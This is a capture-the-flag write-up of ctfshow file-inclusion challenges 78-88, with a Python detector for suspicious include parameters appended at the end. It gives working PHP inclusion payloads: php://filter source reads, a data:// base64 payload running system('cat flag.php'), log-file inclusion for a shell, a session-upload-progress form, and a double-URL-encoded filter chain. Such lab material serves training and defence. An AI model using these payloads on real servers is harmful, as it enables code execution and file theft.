ctfshow web入门 (Web Basics) 78-88: file inclusion
1. web78
Read the source with a PHP pseudo-protocol (stream wrapper); convert.base64-encode returns the file base64-encoded instead of executing it:
?file=php://filter/convert.base64-encode/resource=flag.php
2. web79
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs decodes to <?php system('cat flag.php');
Then view the page source.
3. web80-81
Get a shell by including the log file.
Log file path: ?file=/var/log/nginx/access.log
4. web82-86
File inclusion via session.upload_progress.
This challenge is a bit like WMCTF's "make php great again".
The inclusion is achieved through the session file.
#poc.php (set the form's action to the target's address)
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
5. web87
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
php://filter/write=string.rot13/resource=2.php
The likely reason this fails is that the PHP version is too new and this filter is no longer allowed.
Use base64 instead:
php://filter/write=convert.base64-decode/resource=3.php
Passed via double URL encoding:
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30
After the base64 filter strips the non-base64 characters, only the 6 characters "phpdie" remain. Base64 decodes in groups of 4 characters, so 2 characters must be added to make 8 and keep the part that follows aligned for decoding.
6. web88
Quite a lot is still filtered, but ":" is not.
So we can still use a PHP pseudo-protocol, namely
data://text/plain;base64,poc
This is essentially the same as web79,
except that when base64-encoding you must strip the trailing "=" padding.
The base64-encoded content is <?php system('cat fl0g.php'); ?>
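From the defender's side, the common thread in web78-88 is an include parameter carrying a stream wrapper (php://, data:) or a log path, sometimes hidden behind double URL encoding as in web87. The following is an added example (not part of this writeup or of ctfshow) of a check that decodes a parameter value until it stops changing and then looks for those markers; the sample values are constructed here from the payloads above.

```python
import re
from typing import Optional, Tuple
from urllib.parse import quote, unquote

# Markers that make an include parameter suspicious: the two stream wrappers
# used in this writeup and the log path used for the log-inclusion challenge.
SUSPICIOUS = re.compile(r"(php://|data:|/var/log/)", re.IGNORECASE)

# Constructed sample values, modelled on the payloads in this writeup.
SAMPLES = {
    "web78": "php://filter/convert.base64-encode/resource=flag.php",
    "web79": "data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=",
    "web80": "/var/log/nginx/access.log",
    # Double URL encoding, as in web87: every "%" becomes "%25".
    "web87": quote(quote("php://filter/write=convert.base64-decode/resource=3.php",
                         safe=""), safe=""),
    "benign": "index.php",
}


def fully_decode(value: str, max_rounds: int = 3) -> Tuple[str, int]:
    """URL-decode until the value stops changing. A single-pass decoder
    sees "php%3A%2F%2F" after one round and misses the wrapper scheme."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def classify(value: str) -> Optional[dict]:
    """Return a finding for a suspicious include value, or None."""
    decoded, rounds = fully_decode(value)
    match = SUSPICIOUS.search(decoded)
    if not match:
        return None
    return {"marker": match.group(1).lower(),
            "decoded": decoded,
            "encoding_rounds": rounds}


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, classify(value))
```

Note that data:// also requires allow_url_include=On on the server, while php://filter works without it, so the latter is the one to watch for even on a hardened php.ini.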